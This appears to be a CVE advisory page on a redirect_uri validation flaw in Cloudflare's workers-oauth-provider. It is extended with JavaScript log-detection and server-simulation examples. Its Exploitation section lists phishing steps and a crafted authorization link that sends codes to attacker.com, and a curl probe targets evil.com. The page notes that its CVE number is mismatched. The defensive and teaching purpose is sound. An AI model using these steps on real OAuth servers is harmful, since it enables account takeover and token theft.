How the CVE Works
The vulnerability in Cloudflare's `workers-oauth-provider` stems from missing validation of the `redirect_uri` parameter on the authorization request. OAuth 2.0 (RFC 6749, section 3.1.2) requires the authorization server to compare the `redirect_uri` supplied in an authorization request against the URIs pre-registered for that client, and to refuse to redirect when it does not match. `workers-oauth-provider` only handled `redirect_uri` at the token exchange step. At that step the standard only asks the server to check that the value presented equals the one sent in the authorization request, a check an attacker who chose both values passes trivially. (The identifier on this page does not fit the bug: CVE-2023-3079 is a Chromium V8 type-confusion issue; the `workers-oauth-provider` flaw is tracked in the project's own GitHub security advisory.)
An attacker crafts an authorization link for a legitimate `client_id` with `redirect_uri` pointing at a host they control. If the victim has previously authorized that client and the server auto-approves repeat authorizations, the victim's browser is redirected to the attacker's URI carrying the authorization code, with no consent prompt to warn them. The attacker then redeems the code at the token endpoint (directly for a public client, or with the client secret if they hold it) and obtains an access token for the victim's account, hijacking the session. The flaw defeats the single control OAuth relies on to keep authorization codes from being delivered to arbitrary third parties.
DailyCVE Form
Platform: Cloudflare Workers
Version: Pre-fix commit
Vulnerability: Redirect URI Bypass
Severity: Critical
Date: 2023-03-15
What Undercode Says:
Exploitation:
1. Phishing Setup: Host a page on an attacker-controlled domain to receive the redirect. It can mimic the legitimate OAuth client, but it only needs to log the incoming query string.
2. Craft Malicious URI: a normal authorization request for a legitimate client_id, with redirect_uri pointing at the attacker's host (URL-encoded):
https://oauth-server.com/auth?response_type=code&client_id=legit_client&redirect_uri=https%3A%2F%2Fattacker.com%2Fcallback
3. Social Engineering: Get a victim who has already authorized legit_client to open the link while logged in to the OAuth server; with auto-approval there is no consent screen.
4. Token Capture: Read the authorization code from the query string that arrives at the attacker-controlled redirect_uri, then exchange it at the token endpoint for an access token.
Protection:
- Patch Implementation: Update to the fixed version (after commit `26`).
- Strict Validation: Enforce an exact-match `redirect_uri` check against the client's registered URIs at the authorization endpoint, before any redirect is issued, as well as at the token endpoint. Never prefix- or substring-match, since `https://legit.example.attacker.example/` passes a prefix check.
if (!allowedURIs.includes(redirect_uri)) throw new Error("Invalid redirect_uri");
- Disable Auto-Approval: Require explicit user consent for each authorization, or at minimum whenever the `redirect_uri` differs from the one the user previously approved.
Detection Commands:
- Log Analysis: list every distinct redirect_uri value the authorization endpoint has received, most frequent first, and compare the set against the client's registered URIs; anything else is an attempt, and a 302 response to it is a successful one:
grep -o 'redirect_uri=[^& "]*' oauth_logs.txt | sort | uniq -c | sort -rn
- CURL Test: probe the authorization endpoint with GET (many OAuth endpoints reject HEAD). A server that answers 302 with a Location on the attacker host redirected without validating; a patched server answers 400 before any redirect. An unauthenticated probe may instead bounce to a login page, so repeat it with the session cookie of a user who has already approved the client:
curl -s -o /dev/null -w '%{http_code} %{redirect_url}\n' "https://oauth-server.com/auth?response_type=code&client_id=test&redirect_uri=https%3A%2F%2Fevil.com%2Fcb"
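As an added example that is not part of the original page or of the project's code, the same detection as the grep above done in JavaScript over constructed sample log lines (the log format, the client registry and every hostname are assumptions). It decodes each authorization request's redirect_uri and flags any value that is not an exact match for the client's registered URIs; a flagged request that was answered with a 302 means the server really did send the authorization code there.

```javascript
// Added example (not from the page or the project): flag authorization
// requests whose redirect_uri is not exactly registered for the client_id.
// Hypothetical registry: exact redirect URIs per client_id.
const REGISTERED = {
  legit_client: new Set(["https://legit-client.example/callback"]),
  test: new Set(["https://test-app.example/cb"]),
};

// Constructed sample lines in a common-log-like format (assumed layout).
const SAMPLE_LOG = `
203.0.113.5 - - [15/Mar/2023:10:01:02 +0000] "GET /auth?response_type=code&client_id=legit_client&redirect_uri=https%3A%2F%2Flegit-client.example%2Fcallback HTTP/1.1" 302 0
198.51.100.7 - - [15/Mar/2023:10:03:11 +0000] "GET /auth?response_type=code&client_id=legit_client&redirect_uri=https%3A%2F%2Fattacker.example%2Fcallback HTTP/1.1" 302 0
198.51.100.7 - - [15/Mar/2023:10:03:40 +0000] "GET /auth?client_id=test&redirect_uri=evil.com HTTP/1.1" 302 0
203.0.113.9 - - [15/Mar/2023:10:05:00 +0000] "GET /auth?client_id=legit_client&redirect_uri=https%3A%2F%2Flegit-client.example.attacker.example%2Fcallback HTTP/1.1" 302 0
203.0.113.9 - - [15/Mar/2023:10:06:00 +0000] "GET /auth?client_id=unknown&redirect_uri=https%3A%2F%2Flegit-client.example%2Fcallback HTTP/1.1" 400 0
`;

// ip ident user [time] "METHOD path proto" status
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Parse one line; the request target is resolved against a dummy origin so
// URLSearchParams percent-decodes redirect_uri for us.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const url = new URL(m[4], "https://oauth-server.example");
  return {
    ip: m[1], time: m[2], method: m[3],
    path: url.pathname, params: url.searchParams, status: Number(m[5]),
  };
}

// Return one finding per authorization request that fails exact-match
// validation, with the reason.
function findSuspiciousAuthRequests(logText) {
  const findings = [];
  for (const raw of logText.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    const req = parseLine(line);
    if (!req || req.path !== "/auth") continue;
    const clientId = req.params.get("client_id");
    const redirectUri = req.params.get("redirect_uri");
    const allowed = REGISTERED[clientId];
    let reason = null;
    if (!allowed) reason = "unknown client_id";
    else if (!redirectUri) reason = "missing redirect_uri";
    else if (!allowed.has(redirectUri)) reason = "unregistered redirect_uri";
    if (reason) {
      findings.push({ ip: req.ip, time: req.time, clientId, redirectUri, status: req.status, reason });
    }
  }
  return findings;
}

// Findings where the server answered 302: the code was actually delivered to
// an unregistered URI, i.e. the vulnerable behaviour was exercised.
function codeDeliveredToUnregistered(findings) {
  return findings.filter(f => f.status === 302 && f.reason === "unregistered redirect_uri");
}

const findings = findSuspiciousAuthRequests(SAMPLE_LOG);
for (const f of findings) {
  console.log(`${f.time} ${f.ip} client=${f.clientId} status=${f.status} ${f.reason}: ${f.redirectUri}`);
}
console.log(`${codeDeliveredToUnregistered(findings).length} authorization code(s) redirected to unregistered URIs`);
```

The host-suffix line (`legit-client.example.attacker.example`) is included deliberately: it slips past a startsWith-style check on `https://legit-client.example` and is only caught by exact comparison.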
Mitigation Code Snippet:
app.get('/auth', (req, res) => {
  const { redirect_uri, client_id } = req.query;
  // Reject before issuing any redirect: an invalid redirect_uri must produce an
  // error response, never a 302 to the supplied value.
  if (!validateRedirectURI(client_id, redirect_uri)) {
    return res.status(400).send('Invalid redirect_uri');
  }
  // Proceed with auth
});
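Added example, not code from `workers-oauth-provider` or from this page: a self-contained JavaScript model of the authorization and token endpoints that replays the attack chain from the Exploitation list above against both the vulnerable behaviour (no `redirect_uri` check on the authorization request) and the fixed one, and fills in the `validateRedirectURI` left undefined in the snippet above. Client IDs, hostnames, the code format and the `strict`/`autoApprove` switches are assumptions of the example.

```javascript
// Added example, not code from workers-oauth-provider: a minimal model of an
// OAuth authorization server showing why a redirect_uri check performed only
// at token exchange does not stop the attack, and what the fix looks like.
// Client IDs, hostnames and the code format are assumptions for this demo.

// Hypothetical client registry: exact redirect URIs registered per client_id.
const CLIENTS = {
  legit_client: { redirectUris: ["https://legit-client.example/callback"] },
};

// Server state: issued authorization codes mapped to their grant.
const grants = new Map();
let codeCounter = 0; // stand-in for a cryptographically random code

// Exact string match only. Prefix or host-suffix matching is bypassable
// (e.g. https://legit-client.example.attacker.example/callback).
function isRegisteredRedirectUri(clientId, redirectUri) {
  const client = CLIENTS[clientId];
  return Boolean(client) && client.redirectUris.includes(redirectUri);
}

// Authorization endpoint. strict=true validates redirect_uri against the
// registration before doing anything else (the fix); strict=false reproduces
// the vulnerable behaviour. autoApprove models a client the victim already
// consented to, so no consent screen is shown.
function authorize(requestUrl, { strict, autoApprove }) {
  const u = new URL(requestUrl);
  const clientId = u.searchParams.get("client_id");
  const redirectUri = u.searchParams.get("redirect_uri");
  if (!CLIENTS[clientId]) return { status: 400, error: "unknown_client" };
  if (!redirectUri) return { status: 400, error: "missing_redirect_uri" };
  if (strict && !isRegisteredRedirectUri(clientId, redirectUri)) {
    // RFC 6749 s4.1.2.1: on an invalid redirect_uri the server must return an
    // error and must NOT redirect the user-agent to it.
    return { status: 400, error: "invalid_redirect_uri" };
  }
  let target;
  try { target = new URL(redirectUri); } catch { return { status: 400, error: "malformed_redirect_uri" }; }
  if (!autoApprove) return { status: 200, consentPromptFor: redirectUri };
  const code = "code-" + (++codeCounter);
  grants.set(code, { clientId, redirectUri });
  target.searchParams.set("code", code);
  return { status: 302, location: target.toString() };
}

// Token endpoint. Its only redirect_uri check is the one RFC 6749 s4.1.3
// requires: the value must equal the one sent in the authorization request.
// An attacker who chose both values passes it, so this check alone does not
// stop the attack; it exists to bind the code to its original request.
function exchangeCode({ client_id, code, redirect_uri }) {
  const grant = grants.get(code);
  if (!grant || grant.clientId !== client_id) return { status: 400, error: "invalid_grant" };
  if (grant.redirectUri !== redirect_uri) return { status: 400, error: "invalid_grant" };
  grants.delete(code); // single use
  return { status: 200, access_token: "token-for-" + code };
}

// Replay the attack chain: a victim who already consented opens the link.
function runAttack(strict) {
  const attackerCallback = "https://attacker.example/callback";
  const maliciousLink =
    "https://oauth-server.example/auth?response_type=code&client_id=legit_client" +
    "&redirect_uri=" + encodeURIComponent(attackerCallback);
  const res = authorize(maliciousLink, { strict, autoApprove: true });
  if (res.status !== 302) return { codeLeaked: false, tokenIssued: false, error: res.error };
  // The attacker reads the code from their own callback's query string...
  const leaked = new URL(res.location);
  const code = leaked.searchParams.get("code");
  // ...and redeems it, presenting the same redirect_uri they used before.
  const tok = exchangeCode({ client_id: "legit_client", code, redirect_uri: attackerCallback });
  return { codeLeaked: true, leakedTo: leaked.host, tokenIssued: tok.status === 200 };
}

console.log("vulnerable:", runAttack(false)); // code leaks to attacker.example, token issued
console.log("fixed:     ", runAttack(true));  // refused with invalid_redirect_uri, no redirect
```

Run it with node. The vulnerable run shows the code delivered to attacker.example and a token issued even though the token endpoint did perform its comparison; the fixed run refuses the request with invalid_redirect_uri before any redirect happens. That is the practical point of the "both endpoints" advice above: the token-endpoint check binds a code to its request, only the authorization-endpoint check binds the request to the client's registration.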
Analytics:
- Attack Surface: High (widespread OAuth usage).
- Exploit Complexity: Low (requires user interaction).
- Patch Adoption: Critical (immediate update recommended).
Reported By: github.com